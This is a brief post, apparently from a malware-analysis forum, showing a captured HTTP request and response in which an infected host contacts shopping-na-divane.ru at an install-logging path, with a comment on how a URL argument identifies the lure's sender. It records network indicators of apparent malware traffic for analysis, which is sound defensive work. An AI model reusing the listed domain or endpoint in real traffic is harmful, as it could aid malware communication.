A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #27814  by p1nk
 Thu Feb 04, 2016 12:58 am
Request is over HTTP:

T -> [AP]
GET /system/logs/tool/inst.php?vers=CL% HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Host: shopping-na-divane.ru....

T [AP]
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Feb 2016 00:55:14 GMT
Content-Type: text/html
Content-Length: 10..Connection: keep-alive
Set-Cookie: visitorOfMySite=1; expires=Fri, 05-Feb-2016 00:55:14 GMT
Vary: Accept-Encoding



Looks like the /sender/ argument maps to who send the lure.